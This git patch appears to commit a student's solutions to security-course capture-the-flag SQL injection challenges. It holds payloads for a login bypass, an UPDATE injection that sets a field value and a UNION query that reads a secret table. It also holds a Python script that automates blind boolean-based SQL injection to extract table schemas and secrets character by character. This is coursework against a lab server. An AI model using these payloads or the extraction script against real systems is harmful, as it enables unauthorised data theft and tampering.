From 6ff327335195d85cbfa1ea67e52403554fbb1611 Mon Sep 17 00:00:00 2001 From: didas72 Date: Thu, 11 Dec 2025 21:33:56 +0000 Subject: [PATCH] Lab5 --- .../chall_I_will_take_care_of_this_site.txt | 3 + pa/lab5/chall_money_money_money.txt | 3 + ...sometimes_we_are_just_temporarily_blind.py | 70 +++++++++++++++++++ ...ll_wow_it_cant_be_more_juicy_than_this.txt | 3 + 4 files changed, 79 insertions(+) create mode 100644 pa/lab5/chall_I_will_take_care_of_this_site.txt create mode 100644 pa/lab5/chall_money_money_money.txt create mode 100644 pa/lab5/chall_sometimes_we_are_just_temporarily_blind.py create mode 100644 pa/lab5/chall_wow_it_cant_be_more_juicy_than_this.txt diff --git a/pa/lab5/chall_I_will_take_care_of_this_site.txt b/pa/lab5/chall_I_will_take_care_of_this_site.txt new file mode 100644 index 0000000..aef708c --- /dev/null +++ b/pa/lab5/chall_I_will_take_care_of_this_site.txt @@ -0,0 +1,3 @@ +SELECT id, username, password, bio, age, jackpot_val FROM user WHERE username = '' AND password = '' + +admin' OR username = ' diff --git a/pa/lab5/chall_money_money_money.txt b/pa/lab5/chall_money_money_money.txt new file mode 100644 index 0000000..72bbc90 --- /dev/null +++ b/pa/lab5/chall_money_money_money.txt @@ -0,0 +1,3 @@ +UPDATE user SET bio = ''' WHERE username = 'didas' + +', tokens = '65666 diff --git a/pa/lab5/chall_sometimes_we_are_just_temporarily_blind.py b/pa/lab5/chall_sometimes_we_are_just_temporarily_blind.py new file mode 100644 index 0000000..b884d35 --- /dev/null +++ b/pa/lab5/chall_sometimes_we_are_just_temporarily_blind.py @@ -0,0 +1,70 @@ +from requests import get +from urllib.parse import quote +import re + +BASE = "http://ssof2526.challenges.cwte.me:25262" +PL_HEAD = "' AND id = 0 UNION " +PL_TAIL = "--" + +def get_arts(payload: str) -> int: + final_payload = PL_HEAD + payload + PL_TAIL + resp = get(BASE+"/?search="+quote(final_payload)) + content = resp.content.decode('utf-8') + + result = re.search(r"Found ([0-9]+) article", content) + if result is None: + print("Payload malformed:") + print(payload) + print(content) + exit(1) + + return int(result.group(1)) + +def stringer(column: str, table: str, where: str = "1 = 1", max: int = 50) -> list[str]: + lengths = [] + strings = [] + + for length in range(max): + length += 1 + payload = "SELECT %s, %s, %s FROM %s WHERE LENGTH(%s) = %d AND %s;"%(column, column, column, table, column, length, where) + + arts = get_arts(payload) + + if arts != 0: + lengths.append(length) + print("Length %d has %s"%(length, arts)) + + for length in lengths: + print("Searching for len", length, " ", end="", flush=True) + + name = "" + + for _ in range(length): + print(".", end="", flush=True) + for l in "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_()[]+-*/;:,. !\"&|{}~^`=": + cur_name = name + (l if l != '_' else "\\_") + + payload = "SELECT %s, %s, %s FROM %s WHERE LENGTH(%s) = %d AND '%s' = substr((%s), %d, 1) AND %s;"%(column, column, column, table, column, length, l, column, len(cur_name)-1, where) + if (get_arts(payload) != 0): + name = cur_name + break + + if name == cur_name[:-1]: + name = name + '_' + + strings.append(name) + print(" found", name) + + return strings + +#print(stringer("name", "sqlite_master")) +#print(stringer("sql", "sqlite_master", "name == 'super_s_sof_secrets'", 100)) +print(stringer("secret", "super_s_sof_secrets", max=120)) + + + + + + +# SELECT id, title, content FROM blog_post WHERE title LIKE ' +#' AND id = 0 UNION SELECT id, title, content FROM blog_post WHERE title LIKE 'flag'; -- diff --git a/pa/lab5/chall_wow_it_cant_be_more_juicy_than_this.txt b/pa/lab5/chall_wow_it_cant_be_more_juicy_than_this.txt new file mode 100644 index 0000000..f339e98 --- /dev/null +++ b/pa/lab5/chall_wow_it_cant_be_more_juicy_than_this.txt @@ -0,0 +1,3 @@ +SELECT id, title, content FROM blog_post WHERE title LIKE '%a'%' OR content LIKE '%a'%' + +' UNION SELECT id, title, content FROM secret_blog_post ;--